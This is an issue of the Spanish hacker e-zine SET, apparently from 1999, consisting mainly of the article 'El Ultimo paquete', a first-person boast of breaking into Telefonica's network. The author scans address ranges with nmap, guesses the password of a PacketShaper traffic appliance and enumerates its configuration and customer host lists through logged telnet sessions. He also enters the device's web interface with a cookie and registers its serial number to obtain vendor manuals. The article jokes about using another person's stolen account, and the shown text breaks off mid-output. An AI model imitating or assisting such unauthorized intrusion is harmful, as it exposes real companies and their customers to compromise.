TOP
AutoresTOTAL
LecturasSET 21
146827 visitas
- Contenidos - SET Staff
- Editorial - Editor
- Noticias - SET Staff
- Bazar de SET - Varios Autores
- Como crackear Hexworkshop 1.0 (bazar) - Dark Angel
- Hackeando Screenlock (bazar) - 221bo"sKt
- Walker - Compuserve 3.0 Password Decrypter (bazar) - m0f0
- Tarjeta Universal UNI2 (bazar) - GND
- Cazando Fantasmas (Caller-ID Cutre) (bazar) - Maikel
- Revision del emu de TPT de JM Garcia (bazar) - +NetBuL
- Denial Of Service: Buffer Overflows Remotos (bazar) - Obocaman
- BookMarks - SET Staff
- En El Quiosco Virtual - SET Staff
- En linea con... ArMaND VanHell - GND
- Del PGP al Foton. Presente y Futuro - SiuL+Hacky
- Curso de Novell Netware Aps III & IV - Madfran
- Proyectos, peticiones, avisos - SET Staff
- ASM y Buffer Overflows - Doing
- The Bugs Top 10 - Falken
- UNDERCON III: El Hack Hispano se reune - GND
- SET Inbox - Paseante
- TEMPEST: Como nos vigilan? - Krip7ik
- SIMO 99: Que hay de nuevo? - SET Staff
- El Ultimo paquete - Paseante
- Terminales Graficas - FCA00000
- La Biblioteca del Hacker - SET Staff
- Crackeando L0pthcrack 2.0 - Madfran
- Jakin para anormales - Jnzero
- Real como la vida misma: Detenido! - SET Staff
- Fuentes Extract - SET Staff
- Llaves PGP - SET Staff
El Ultimo paquete
Autor: Paseante
-[ 0x0E ]-------------------------------------------------------------------- -[ EL ULTIMO PAQUETE ]------------------------------------------------------- -[ by Paseante ]------------------------------------------------------SET-21- Hace mucho tiempo en una galaxia muy lejana... INTRODUCCION Bienvenido a este viaje. Es un viaje en el que vamos a descubrir y explorar un nuevo sistema, al menos para mi, veremos en primera fila como se efectua un hackeo y de paso le daremos en los morros a Timofonica. Si esto no te ha convencido de leer lo que sigue no se que lo hara ;-DD Este articulo se debe en parte a dos personas, a FCA00000 que al contar sus faza~as en SET 20 ha reavivado el interes de nuestros lectores por el 'lado oscuro' y a Madfran, que si bien jamas me ha animado ni sugerido hacer nada ilegal, apunto una vulnerabilidad del servidor web de Telefonica -http://www.telefonica.es- en la lista del staff del SET. Y claro, aqui teneis a vuestro humilde servidor (que no asume la autoria de nada y que escribe en primera persona solo porque queda mejor) que aun estando inmerso en otras historias completamente ajenas y semi- retirado del ajetreo que conlleva este mundillo no puede evitar darse una vuelta por las fauces del monstruo Timofonico y ver como esta la cosa....asi empieza nuestra historia. - PARTE I-. DANDO FORMA A SU PAQUETE Fue recibir el mensaje de Madfran y darme una vuelta por www.telefonica.es, en efecto habia un serio problema de configuracion que me permitio bajarme el fuente de varios CGI entre otras cosas...estuve mirandolo un poco ya desconectado y pense. Por que no mirar un poco mas toda la red de Timofonica? Dicho y hecho, usando una cuenta cualquiera y con varios trucos que ya se han explicado en SET vuelvo a la carga dispuesto a hacer un ping-scan con nmap sobre un grupo de clases C como: 194.xxx.?5.* 194.xxx.?2.* 194.xxx.?2.* entre otras Por cierto, acostumbrate a que a partir de ahora altere datos, oculte direcciones IP y suprima y modifique output de las maquinas afectadas. Y como siempre comentarios intercalados en el output de comandos en las lineas que empiecen por $$. Lo que no recomiendo es pillarle la cuenta a uno que te caiga mal en el IRC y usarla, luego cuando la pasma vaya a por el y le pillen la guia del superhacker seguro que no se libra ni de casualidad. :-X Como la mayor parte de esas maquinas estan tras algun tipo de bloqueo o son Windozes, algunos de los 'stealth scan' no sirven de nada, tras mirar un poco aqui y otro alla y por gentileza de la srta. Rocio S. me guipo una serie de logins/passwords que no me sirven de nada y una lista de equipos accesibles en la red interna (Direcciones IP privadas del rango 192.168.) Y mira por donde examinando el monton de logs que he acumulado encuentro algo que me llama la atencion.....hora de que comience el juego. En mi desconocimiento e ignorancia me dirijo felizmente a una web en alguna IP perdida que pone algo como "PacketShaper" y una caja de entrada para meter una clave. Como tonto del todo no soy, colijo que se trata de algun sistema para distribuir el ancho de banda. Claves a mi!. Acierto a la primera. (Natural). Y me encuentro con una cosa muy chula con frames, formularios, Javascrises de esos. Muy bonito, pero es tiempo de entrar por telnet (tambien se puede) porque asi puedo hacer un log :-)): pas@solsticio:~> telnet 194.*.xxx.* | tee timo-log5 Trying 194.*.xxx.*... Connected to 194.*.xxx.*. Escape character is '^]'. PacketShaper (194.*.xxx.*) Password: PacketShaper v4.0.4g1 1999-08-11 Copyright (c) 1996-1999 Packeteer, Inc. All rights reserved. Packet shaping: off. $$ Perfecto, ya estoy dentro. Pero dentro de que?. Mi truco de siempre ;-) PacketShaper> help PacketShaper commands are divided into five groups: shaper Group of commands to configure and view the traffic- shaping facilities of the PacketShaper--class, policy, partition, hostdb, traffic, links, measure, hl, event setup Command to configure and view the basic settings of the PacketShaper group Command to manage the Group Configuration Service (GCS) diagnostic Group of diagnostic commands--arp, dns, mib, ping, net, sys, and uptime utility Group of file manipulation commands miscellaneous Group of miscellaneous commands--look, touch, exit, help, reset, run, version, schedule, group, image For more information on a group of commands, type "help <group>". For more information on a specific command, type "help <cmd> ...". PacketShaper> help shaper The following are the traffic shaping-related commands: class Configure and view traffic classification email Manage Email event Manage User Events hostdb View host database information partition Create, modify, and view partition information policy Apply, remove, or modify policies traffic Display traffic class usage information links Display link statistics measure Configure and retrieve data from measurement engine rtm Display or configure Response Time Measurement PacketShaper> help links To display access link statistics, use the following command: links <arg> ... where <arg> is one of the following: show Display link statistics PacketShaper> links show Interface Speed Cur 1 Min Peak rate avg rate -------------------------------------------- Outside 50000000 5.5M 5.2M 22.3M Inside 50000000 10.2M 9.6M 26.7M $$ Esto nos interesa, lo que dice es que este PacketShaper esta instalado $$ en un lugar en el que hay dos conexiones de 50MB cada una para trafico $$ interior y exterior. Luego os explicare en mas detalle :->. PacketShaper> help miscellaneous The following are the miscellaneous commands: look Resume look-level access (view-only) touch Acquire touch-level access (view or modify) exit Logout help On-line help facility image Image commands run Execute a script file schedule Schedule commands version Display PacketShaper software version & serial number $$ De aqui destacar los comandos look y touch, el PacketShaper funciona $$ como los Cisco, con la password de entrada estas en modo look (solo mirar) $$ con una segunda password para touch puedes modificar la configuracion y $$ obtener el control total (al estilo enable en Cisco) PacketShaper> touch Password: Touch access denied $$ Casi! PacketShaper> help image The following are the image commands: list List contents of the current PacketShaper image show Show image version(s) PacketShaper> image show Active Image version: PacketShaper v4.0.4g1 1999-08-11 Backup Image version: PacketShaper v4.0.3g3 1999-07-01 Bootloader version : Bootloader v3.00g1 1997-09-22 PacketShaper> image list 3256 06/04/1999 10:52:44 about.htm 7798 03/12/1999 17:35:28 art.htm 6703 03/15/1999 08:59:36 artgmore.htm 7093 03/15/1999 08:59:34 artgraf.htm 9408 06/04/1999 10:53:46 artview.htm 3617 03/08/1999 18:18:20 artwclt.htm 269 06/25/1998 13:41:32 images/menu0.gif 256 06/25/1998 13:41:32 images/menu1.gif 221 03/11/1999 17:11:40 images/menu10.gif 2039 12/03/1998 18:06:58 libform.js 9794 10/20/1998 14:58:38 libmd5.js 2441 10/23/1998 13:01:16 libmenu.js 14233 07/21/1999 10:47:54 libpctl.js 1913 12/28/1998 13:03:26 polbuck.htm 6198 05/03/1999 11:41:06 polerr.htm 5645 11/25/1998 15:44:54 polfovr.htm 1872 03/01/1999 16:02:52 policy.htm 4808 12/29/1998 18:46:44 polipqos.htm 2821 11/25/1998 15:44:54 polprec.htm 11979 07/12/1999 14:04:44 polscal.htm 10823 01/28/1999 15:45:16 GraphT/GraphTop.gif 8126 01/28/1999 15:45:16 GraphT/GraphTop.gif 1368 07/21/1999 13:12:06 pshelp/tspecrit.htm 2795 03/15/1999 10:20:16 pshelp/ttoshlp.htm 36422 07/21/1999 10:23:20 rptbld.htm 5852 07/21/1999 10:37:02 rptevt.htm 9308 07/21/1999 11:51:38 rptmain.htm 12348 05/03/1999 11:10:34 rpttop.htm 3936 02/08/1999 12:27:46 tophdlog.htm 1173 01/26/1999 16:54:48 toplstrs.htm 1175 01/26/1999 16:54:46 toptalks.htm 3181 03/26/1999 17:26:02 tspecd.htm 4786 06/28/1999 17:23:52 tspectos.htm 2053840 08/11/1999 16:34:04 ram.abs $$ He editado mucho este listado, mostraba toda la estructura de la web $$ pero salen un porron de ficheros y se me hacia pesado. Dejo unos $$ pocos para que os hagais una idea. PacketShaper> pepe arp ARP commands class Classifier commands dns DNS commands ds Directory configuration commands group Group configuration commands help On-Line help facility hl Host list configuration commands hostdb Host database commands image Image commands ipfilter IP filter commands links Link commands look Withdraw touch access (go back to look-only access) measure Measurement commands mib MIB commands net Network statistics commands partition Bandwidth partition commands policy Policy commands rtm Display or modify Response Time Measurement information schedule Schedule jobs setup Setup network addresses and access control sys System level commands (mon, event, buf, tim) touch Grant touch access traffic Display traffic class/usage information uptime Display system uptime version Display software version $$ Mira que chulo XDDD PacketShaper> help ds usage: ds <arg> ... where <arg> is one of the following: cd Browse to directory entry dump Dump current directory entry's contents local Store configuration locally (no directory synch) ls List children of the browser's current entry pwd Show browser's current directory entry DN sessions Show LDAP session status PacketShaper> ds dump iqosConfigurationAgent 194.*.xxx.*, 19990705083013Z iqosConfigurationConsumer 194.*.xxx.*, 19990331140831Z iqosGlobalHostListsDn ou=hostlists,ou=_global,ou=pscfg,o=tsai.es iqosGlobalRootDn ou=_global,ou=pscfg,o=tsai.es iqosIpAddress 194.*.xxx.* iqosLocalHostListsDn ou=hostlists,ou=194.*.xxx.*,ou=pscfg,o=tsai.es objectClass iqosConfigurationRoot objectClass top $$ Estos de TSAI, (Telefonica Servicios Avanzados de Informacion) no son de $$ aqui los dos tipos que presionaron para chaparnos por segunda vez la $$ web?. Creo que GreeN LegenD sabia del tema. PacketShaper> net nic Read chip status ip Show IP info pna Show network status PacketShaper> net ip MyIpAddr 194.*.xxx.* mask ffffffc? Site Router 194.xxx.*.xx Inside: 00:80:bb:2f:c3:e2 hardware = 00:80:bb:2f:c3:e2 Outside: 00:80:bb:2f:c3:e2 hardware = 00:80:bb:2f:c3:e3 Ignore relay rate: in 3738749 out 8370837 local MIB: [ 0] RcvdPkts 91638 [ 1] RcvdPktsFiltered 15800 [ 2] TxPkts 34127 [ 3] TxUnrouteable 0 [ 4] TxBcasts 0 $$ Y un monton de rollo mas que me salto, la configuracion basica del $$ PacketShaper incluye darle una direccion IP, decirle cual es el router $$ que sale a Internet, el gateway, un servidor DNS...claro que todo eso $$ lo aprendi al bajarme los manuales y para ello tuve que hacer un 'invento'. PacketShaper> uptime System up for 2 days 19 hours 33 mins 1 secs PacketShaper> version Version: PacketShaper v4.0.4g1 1999-08-11 Product: PacketShaper 4000 Serial Number: 100-10003xxx Memory: 128MB RAM, 7.6MB Flash total, 3.0MB Flash available Copyright (c) 1996-1999 Packeteer, Inc. All rights reserved. $$ El numero de serie lo mutilo, luego tuvo su historia. :-) PacketShaper> sys info Display System Information buf Buffer commands dio Digital I/O commands diag Run diagnostic commands event Event manager commands kmemory Kernel memory commands limits Show configuration limits lcd LCD test commands mon Monitor commands nic Diagnostic NIC commands set Variable setting commands tim Timer commands utc Coordinated Universal Time commands PacketShaper> sys info CPU Brand: AuthenticAMD CPU Speed: 369 MHz (measured) Memory: 128 MB BIOS info: 99/01/21 V1.09 (C) 1997 Gateworks Development $$ En esta primera sesion estoy intentando obtener el maximo de info $$ posible del sistema, asi cuando desconecte tendre bastante que estudiar $$ Sigamos viendo la configuracion. PacketShaper> sys limits Statically allocated objects Current Remaining Total ------------------------------------------------------------------- Traffic classes 138 374 512 Partitions 9 247 256 Policies 2 510 512 Matching rules 232 408 640 Classes with traffic discovery 0 32 32 Classes with RTM 0 16 16 Classes with top talkers/listeners 0 12 12 TCP flows 48614 2586 51200 Other IP flows 25600 0 25600 $$ Si no sabes que es esto tranquilo, yo tampoco lo sabia y me entere $$ mas tarde. $$ Fijate en el numero de conexiones que muestra, no hace falta ser $$ muy espabilado para darse cuenta de que no estamos en Calzados Perez. Dynamically allocated objects Current Potential Total ------------------------------------------------------------------- Matching rule host references 117 1183 1300 Host list entries 5 5611 5616 DNS names 113 5929 6042 Note: "Potential" for each object is an estimate allocating all remaining dynamic memory to that object type. PacketShaper> sys verify That command [verify] requires touch access. $$ Otra vez el touch pero no voy a insistir porque como desconozco el $$ sistema solo falta que la pifie. PacketShaper> sys set System values Current Default Min Max ========================================================================= artGapInclusion 0 0 0 1 assertDisable 1 0 0 9999999 bridgeBcastAT 1 1 0 1 bridgeBcastDEC 1 1 0 1 bridgeBcastFNA 1 1 0 1 configPeriod 60 60 0 86400 connResourcePpt 1024 1024 10 1024 dgFlowIdleTime 60 60 10 3600 diagInterval 9000000 9000000 0 86400000 loSpeedThresh 56000 56000 300 9999999 mailQueueMax 32 32 32 128 touchRecoveryTime 30 30 0 3600 userEventMaxDefinitions 32 32 32 128 userEventMaxRegistrations 32 32 32 128 writeProtectFiles 1 1 0 1 $$ Otro listado enorme pasa por mi pantalla, menos mal que va a un log! $$ Recorto el 90% y lo pongo aqui para que veas un poco, yo no me lo mire $$ demasiado. PacketShaper> sys mon idle Display CPU idle time cmos Display CMOS settings struct Display structure sizes PacketShaper> sys mon cmos Date & Time: 21:58:28, 1999-xx-xx Base Memory: 576 Kbytes (configured) Extd Memory: 576 Kbytes (configured) Extd Memory: 576 Kbytes (detected by POST) Hard Disk C: 1 Hard Disk D: 3 CMOS Status: Battery=OK, Config=OK, Memory=OK, Disk=OK, Time=OK CMOS ChkSum: 0da4 (Correct) $$ No pensaras que iba a dejar el dia y la hora tal cual. :-) PacketShaper> sys nic info device INSIDE 00:80:bb:2f:c3:e2 Link State: UP (speed = 100000000) Controller Type: PCnet-FAST 79C971 nic0 MIB: [ 0] TxOctets 3236795492 [ 1] RxOctets 3476696884 [ 2] TxUnicast 243266809 [ 3] RxUnicast 276920847 [ 4] TxNonUnicast 4061 [ 5] RxNonUnicast 134168 [ 6] TxQueued 2 [ 7] rxQueued 277057183 [ 8] TxTimeouts 0 [ 9] RxDrops 0 [10] TxErrors 2 [11] RxRunts 0 [12] TxBabbleErrors 0 [13] RxErrors 0 [14] TxBufferErrors 0 [15] RxOverflowErrors 0 [16] TxRetryErrors 0 [17] RxFramingErrors 0 [18] TxUnderflowErrors 0 [19] RxCrcErrors 0 [20] TxLateCollisions 0 [21] RxFifoErrors 0 [22] TxNoLinkErrors 2 [23] RxMissedErrors 0 [24] TxRingFullErrors 0 [25] RxLateDrops 3 [26] TxInterrupts 0 [27] RxInterrupts 0 [28] NumRestarts 0 [29] NumInterrupts 0 [30] IsrReenters 0 [31] LinkChangeTime 5 [32] DrdQuad0 85 [33] DrdQuad1 0 [34] DrdQuad2 17 [35] DrdQuad3 0 [36] DrdBrickWallHits 0 NIC 0 PHY Control (reg0=2100, reg17=ffffc001). mode: manual duplex: FULL speed: 100 NIC 0 PHY Status (reg1=780d) Auto-negotiation supported: YES (incomplete) 100bt Full duplex supported: yes 100bt Half duplex supported: yes 10bt Full duplex supported: yes 10bt Half duplex supported: yes NIC 0 PHY Ability (reg4=1e1) 100bt Full duplex supported: yes 100bt Half duplex supported: yes 10bt Full duplex supported: yes 10bt Half duplex supported: yes device OUTSIDE 00:80:bb:2f:c3:e3 Link State: UP (speed = 100000000) Controller Type: PCnet-FAST 79C971 nic1 MIB: [ 0] TxOctets 1873185020 [ 1] RxOctets 781601823 [ 2] TxUnicast 276876370 [ 3] RxUnicast 243611937 [ 4] TxNonUnicast 136227 [ 5] RxNonUnicast 1998 [ 6] TxQueued 0 [ 7] rxQueued 243614077 [ 8] TxTimeouts 0 [ 9] RxDrops 0 [10] TxErrors 2 [11] RxRunts 0 [12] TxBabbleErrors 0 [13] RxErrors 0 [14] TxBufferErrors 0 [15] RxOverflowErrors 0 [16] TxRetryErrors 0 [17] RxFramingErrors 0 [18] TxUnderflowErrors 0 [19] RxCrcErrors 0 [20] TxLateCollisions 0 [21] RxFifoErrors 0 [22] TxNoLinkErrors 2 [23] RxMissedErrors 0 [24] TxRingFullErrors 0 [25] RxLateDrops 16 [26] TxInterrupts 0 [27] RxInterrupts 0 [28] NumRestarts 0 [29] NumInterrupts 0 [30] IsrReenters 0 [31] LinkChangeTime 5 [32] DrdQuad0 238 [33] DrdQuad1 84 [34] DrdQuad2 72 [35] DrdQuad3 71 [36] DrdBrickWallHits 0 NIC 1 PHY Control (reg0=2100, reg17=ffffc001). mode: manual duplex: FULL speed: 100 NIC 1 PHY Status (reg1=780d) Auto-negotiation supported: YES (incomplete) 100bt Full duplex supported: yes 100bt Half duplex supported: yes 10bt Full duplex supported: yes 10bt Half duplex supported: yes NIC 1 PHY Ability (reg4=1e1) 100bt Full duplex supported: yes 100bt Half duplex supported: yes 10bt Full duplex supported: yes 10bt Half duplex supported: yes $$ Mas info, esta vez sobre las tarjetas, nos viene a decir que soportan $$ 100 MB/S y como esta yendo el trafico que pasa por ellas. $$ La tarjeta INSIDE se conecta al hub de la LAN y la OUTSIDE al router $$ que sale a INTERNET. PacketShaper> policy show Show details of a specified policy PacketShaper> policy show usage: show <tclass> [clear] $$ tclass?. No lo tengo claro, ya lo mirare mas tarde. PacketShaper> help setup To configure and view the PacketShaper basic settings, use the following command: usage: setup <arg> ... Where <arg> is one of the following: failover Set/show failover configuration nic Set interface speed and duplex show View basic configuration PacketShaper> setup show IP address: 194.*.xxx.* Subnet mask: 255.255.255.1xx Inside nic speed: 100BT full-duplex Outside nic speed: 100BT full-duplex Gateway: 194.xxx.*.x Site router: 194.xxx.*.x DNS server(s): 194.xxx.*.x Default domain: tsai.es Inside interface: unsecure Outside interface: unsecure Look password: ****** Touch password: ****** Link speed: 50M Packet shaping: off Traffic discovery: off SNMP look community: tsai SNMP touch community: ****** SNMP Trap destinations: 192.168.10x.* Modem on Console: off Email host:port: none Email sender: none Date, time, timezone: Sat Nov xx 15:31:49 1999 CEST (Paris) $$ Eso del packet shaping off me escamaba y lo de insecure interface :-? PacketShaper> hl context Show or set host list context resolve Resolve DNS names in the host list show Show host lists, or details of a named host list PacketShaper> hl show Host list entries in the current (local) context: cn=Comercio_Alcampo 194.*.x.xx 194.*.xxx.61 cn=Comercio_BBV 194.*.x.xxx 194.*.53.x 194.*.x.xxx... cn=Comercio_CajaMadrid 195.xxx.105.x 195.x.*.xxx cn=DirWeb_ElPais 194.*.x.xxx 194.*.55.x 194.*.xx.x... cn=InfoNegocio 195.xxx.*.x 195.xxx.*.x 195.xx.x.* $$ Pues ese que una vez decia que lo de poner * y x en vez de las IP $$ verdaderas estaba muy currado no sabe que razon tiene. }:-> PacketShaper> help partition Partitions may be created to separate different traffic classes' use of bandwidth. Originally, there is a single partition associated with each direction and the corresponding built-in traffic class, inbound and outbound. Each partition has a size corresponding to the corresponding link bandwidth. You may create additional partitions, carving that link bandwidth into multiple, independent pieces. The traffic classes that are in the same partition share that partition's bandwidth; traffic classes that are in different partitions do not share bandwidth at all. usage: partition <arg> ... where <arg> is one of the following: show Display the partitions or a particular partition $$ Por si no lo ves claro, una particion es igual que su homonima del HD, $$ dividir un total entre varios trozos. Tengo 50MB de salida y quiero $$ repartirlos de una manera x. Aqui vemos 9 particiones creadas. PacketShaper> partition show Link speed: inbound 50M outbound 50M Partition name Size Guarntd Excess Usage Cur 1 Min Peak rate avg rate ------------------------------------------------------------------------------- Inbound 11991000 0 0 5.7M 5.0M 4.6M 21.8M ------------------------------------------------------------------------------- Outbound 10494000 0 0 9.4M 7.9M 8.1M 24.1M Grupo_El_Pais 1000 0 0 995k 1.0M 1.0M 9.6M Web_FondosWeb 1000 0 0 0 92 4498 902k Web_Educalia 1000 0 0 3432 4965 4017 334k Web_AEAT 1000 0 0 12.8k 6122 2511 98.2k Web_TKON 1000 0 0 0 0 0 51 Web_ABC 1000 0 0 0 0 0 880 Web_Instituto_Cervantes 1000 0 0 0 0 0 0 $$ Aqui vemos como hay ochos particiones de salida y que El Pais genera un $$ trafico de narices (yo contribuyo visitando su web casi a diario) Ahora me meti a mirar la mib (Managemente Information Database) y salian un monton de cosas raras, era tarde y los Simpsons estaban a punto de empezar. Hora de desconectar. - PARTE II-. DONDE ESTARA MI PAQUETE? Acabamos de asistir al primer acto del hackeo mas serio jamas documentado en Espa~a. No, no me ha dado la vena de que soy 'SET membah' simplemente que en SET se ponen por escrito cosas de las que normalmente solo nos enteramos por la prensa...cuando hay detenciones. Nosotros pretendemos escribir de ello desde la normalidad y reivindicando que un hacker (todos a coro) NO es un delicuente. Eh!, y yo tampoco!!. Dejemos aparte las seis lineas ideologicas y volvamos a la accion. Examinemos la situacion, hay dos problemas: 1) No tenemos ni papa de que sistema es ese, aunque los comandos sean bastante autoexplicativos y supongamos para que vale nos hace falta una referencia mas solida si queremos investigar mas. 2) No tenemos acceso touch, solo look. (Igual me pasa con las tias). Asi que voy a http://www.packeteer.com y mucha foto, mucha propaganda pero para entrar a la parte de Documentacion tienes que ser usuario registrado. Me estan fastidiando todas estas empresas que venden cosas raras y luego no ofrecen info mas que a los que las compran, ultimamente me he tropezado con varias. No comprenden que eso solo llevan a que tengamos que hackear algo para conseguir lo que podrian dar gratis??. A ver, encuentro una URL http://www.packetshaper.com (o algo asi) donde puedes entrar poniendo el numero de serie siempre que el cajetin ese (el PS) este registrado. Numero de serie? me suena. Bingo!. Lo muestra al ejecutar el comando 'version'. Pruebo y me sale algo como: Sorry, your PacketShaper serial number was not found One of the following conditions may exist: * Your serial number is not registered. * You mistyped your serial number. La segunda no es porque he hecho el tipico cut&paste asi que resulta que los vagos de TSAI no han registrado su PacketShaper. Pues no hay problemo!!. Me planto en el PacketShaper de TSAI con mi browser, no meto clave (entro usando una cookie) y le doy al boton de "Registration and Support". Me lleva a la web de Packeteer a meter mis datos personales, contesto verazmente a todo (mentir es pecado) y me permito la licencia humoristica, a mi entender, de poner Timofonica en el apartado de Empresa. Listo, registrado. Con dos narices. Para que digan que los hackers solo hacemos que estropear cosas, ahora aparezco en el area de documentacion de Packeteer y me bajo los siguientes archivos: ps4000gs.pdf PacketShaper Getting Started Guide (562k) 40.refguide.pdf PacketShaper Reference Guide v 4.0 (1.9M) Estos se unen a tres que estaban publicamente disponibles y que eran una especie de folletos propagandisticos pero que al menos sirvieron para hacerme una idea de que iba el invento. http://www.packeteer.com/technology/pdf/white2.pdf http://www.packeteer.com/techonology/pdf/foursteps.pdf http://www.packeteer.com/technology/pdf/network.pdf Con mas de 3MB de documentacion ya puedo empezar a enterarme de como funciona el cajetin este (tambien me he bajado un gif para verlo :-) ) Y tu ahora querras que te lo explique en 20 lineas...hare lo que pueda. Pero ahora, tras realizar mi buena accion del dia, otra pausa. He quedado y ya llego tarde y eso de "No mira, es que me habia enrollado hackeando Telefonica" creo que no cuela como excusa creible. :-( .................... .................... Volvemos a la carga: Me leo unos cuantos archivos y ya estoy mas puesto en el PS, voy a tratar de resumirlo. Si no te aclaras visita la web de Packeteer y bajate por ejemplo el archivo foursteps.pdf que esta al alcance de 'to quisqui'. Que es un Packetshaper? Fisicamente, una especie de maletin de unos 5 kg de peso con 2 conectores de red, un puerto serie y un LCD. Logicamente, un sofisticado sistema de control de trafico con un sistema operativo propio. Y que hace? Normalmente se instala entre tu hub y el router que da salida a Internet, su mision es controlar todo el trafico que entra y sale pero no como un firewall sino con un objeto muy diferente: Dar prioridad a un trafico en detrimento de otro, establecer minimos garantizados, desviar cierto tipo de trafico. Para ello el PacketShaper (PS), una vez configurado y en marcha, cuenta con varias caracteristicas que veremos ahora. 1- Traffic Discovery, si se activa esta opcion (por defecto ON) el PS analiza tanto el trafico OUTBOUND (que va de dentro de la red hacia fuera) y el INBOUND (que viene de fuera a dentro de la red) creando CLASES de trafico por defecto. Tambien puedes crear tu las clases que quieras. 2- Clases. Las clases pueden ser tan genericas o detalladas como quieras: Por ejemplo: /INBOUND/HTTP que pillaria todo el trafico HTTP dirigido hacia la red interna /OUTBOUND/xxx.xxx.xxx.xxx/QUAKE-2 que englobaria el trafico externo generado por la IP xxx.. usando el protocolo del Quake-2. /INBOUND/Citrix_Traffic/From_Ingenieria/Excel podria ser una clase que se aplicase a todo el trafico Citrix que entra a la red, que procede de nuestro departamento de Ingenieria en..Malasia? y que dentro de ese trafico Citrix SOLO se aplicaria a aquellos que van a trabajar con Excel y no a los que van a jugar a Civilization ;-). El nivel de detalle que permite es impresionante (en dos palabras) pudiendo crear toda una clase de trafico para un archivo determinado. Por ejemplo, si justo posteas el ultimo kernel de Linux y no quieres que te colapse el servidor podrias establecer una POLITICA (policy) que determine cuanto trafico puede generar ese archivo, en que condiciones y que pasa si excede el trafico permitido. Ahora tienes un monton de clases ya que el PS las genera automaticamente analizando el trafico que ve pasar (y recuerda que al estar entre tu LAN y el router hacia la WAN lo ve TODO), ademas no te pienses que se pierde. El condenado lo entiende practicamente todo, mas de 150 protocolos distintos y es incluso capaz de seguir sesiones que cambian de puertos dinamicamente o sesiones en puertos no usuales (no pienses que por que pongas tu servidor web particular en el puerto 514 va a dejar de darse cuenta de que ese trafico es HTTP). Un mal bicho. Que haces con tanta clases? 3- Politicas. Aqui tenemos un PS analizando cuanto? 20Mb/s de trafico?. Mas? El nuestro en particular tenia el shaping off, eso quiere decir que no aplica ninguna politica al trafico, simplemente lo ve y lo deja pasar. El shaping se cambia ejecutando: > setup shaping <on|off|bypass> off (por defecto) El PS ve el trafico y lo deja pasar transparentemente on El PS aplica las politicas especificadas a cada clase de trafico que las tenga bypass El PS hace como si no existiese Para cambiarlo se necesita nivel touch que no tenemos...de momento. Y que politicas se pueden aplicar? Basicamente son tres Una que garantiza un nivel minimo Por ejemplo: Clase VoiceOverIP. 20kb/s guaranteed Con menos quien puede oirse? XDD Otra que da prioridad a un trafico sobre otro a la hora de repartirse el ancho de banda 'sobrante'. Por ejemplo: Clase /INBOUND/Telnet/MiservidorSAP/desde-soporte-tecnico: Priority 6 Queremos que nos arreglen el servidor si o no? :-DD Y la otra ya la hemos visto en el log, la particion, digamos que tengo 40MB/S de conexion Clase /Pet-Mi-RED/ Particion 1000k Otorga 1000k de esos 40MB a las peticiones que origine mi red, si sobra algo se lo reparten las otras clases segun prioridad. Mas o menos esta politica (la basica) funciona como el CIR y el EIR de una Frame Relay, o sea: A ti te doy esto, a ti esto otro, a ti esto poco que me queda y lo que os sobre a cada uno mas lo que no esta asignado os lo repartis siguiendo esta prioridades que os he puesto. Luego hay otras politicas muy majas como Discard, Never-Admit e Ignore. Discard, esto es como un firewall, todo ese tipo de trafico se descarta sin dar ni los buenos dias. Por ejemplo, que nuestro compa~ero de trabajo nos cae mal?. Pues nada, todo el trafico HTTP que vaya a su IP lo descartamos y que curre en vez de visitar webs porno. Solo hay que dar a un boton. Never-Admit, nos permite controlar quien entra y quien no y redirigir el trafico. Por ejemplo si PS detecta que el servidor web se esta hundiendo por debajo de los tiempos de respuesta establecidos como minimos (hemos puesto las fotos de -tufantasiapreferidaaqui- desnuda) puede automaticamente dirigir el trafico a una pagina que diga. "Lo siento, estamos colapsados" Ignore, pues eso que pasa de todo. Que no se meta en ese trafico. Por ejemplo que no mangonee en el trafico SSH o HTTPS. 4- Informes. Para disfrutar eso hay que ir a la Web, genera informes y estadisticas para parar un tren, completamente configurables en intervalos de tiempo, datos mostrados...yo me saque un par por la impresora. Por supuesto con graficos de tarta, colorinos....un pasote. Un informe con el listado de todas las clases de trafico del PS objetivo me ocupo 7 paginas, muestra el numero de conexiones, la cantidad de trafico, el trafico garantizado y la particion (si las hay).. No es extra~o si recuerdas que al hacer > sys limits Mostraba 138 clases (hasta un maximo de unas 550 aun queda) 9 particiones (ya las vimos), 2 politicas definidas...etc - PARTE III-. PASO AL PAQUETE De nuevo en las trincheras, esto es lo que pienso hacer ahora: 1) Otra entrada por telnet para probar unos cuantos comandos mas y que me llene mas el articulo ;-> 2) Entrar por la web que es mas mono y sacarme algunos informes mas que quedan chachi piruli. 3) Se me olvidaba. Eso del touch. Que aunque no quiera liarla me fastidia no tener acceso total. pas@solsticio:~> telnet 194.*.xxx.* | tee timo-log6 Trying 194.*.xxx.*... Connected to 194.*.xxx.*. Escape character is '^]'. PacketShaper (194.*.xxx.*) Password: PacketShaper v4.0.4g1 1999-08-11 Copyright (c) 1996-1999 Packeteer, Inc. All rights reserved. Packet shaping: off. PacketShaper> rtm drilldown Show worst clients and servers for a traffic class show Show RTM statistics worst Show classes with worst RTM values $$ Ya es hora de que vosotros os chupeis las 138 clases. Alla vamos. PacketShaper> rtm show Traffic Response Time (ms) Class Goodness Total Network Server ------------------------------------------------------------------- Inbound Pet_Web_Telefonica_Anonimo --- 1.5 1.5 16 Correo_Telefonica --- 688 583 105 Peticiones_ESINT70 --- 1.6 1.5 30 Peticiones_ESIWeb2 Pet_www.congreso.es --- 1.5 1.4 86 Pet_www.bbv.es --- 1.2 1.1 69 Peticiones_ESIWeb2_default --- 1.3 1.2 25 Proxy_NT_Corporativos --- 205 17 189 Pet_Mall_Alcampo --- 1.3 1.2 124 Pet_Mall_BBV --- 1.4 1.0 340 Pet_Mall_CajaMadrid --- 861 764 97 Peticiones_1_millon --- 2.3 2.3 24 Peticiones_El_Pais --- 1.5 1.5 24 Peticiones_InfoNegocio --- 1.0 970 62 Peticiones_Web_Educalia --- 1.1 1.1 24 Peticiones_Web_FondosWeb --- 1.4 1.4 27 Peticiones_ESINT10 --- 3.7 3.7 42 Peticiones_AltaVista --- 3.8 3.6 173 Peticiones_Mensatex_Int --- 487 433 54 Peticiones_Web_GIS --- 1.8 1.7 85 Peticiones_Web_Nestle --- 891 863 28 Peticiones_Web_PAM --- 1.8 1.3 526 Peticiones_Web_TKON --- 316 316 1 Peticiones_Web_TTD --- 658 345 313 Proxy_ABC --- 2.2 1.4 829 News_Entrada --- 683 625 59 Peticiones_ESIWeb2c Peticiones_AEAT --- 2.2 2.2 19 Peticiones_ESIWeb2c_default --- 1.6 1.5 37 Peticiones_Iberia --- 1.5 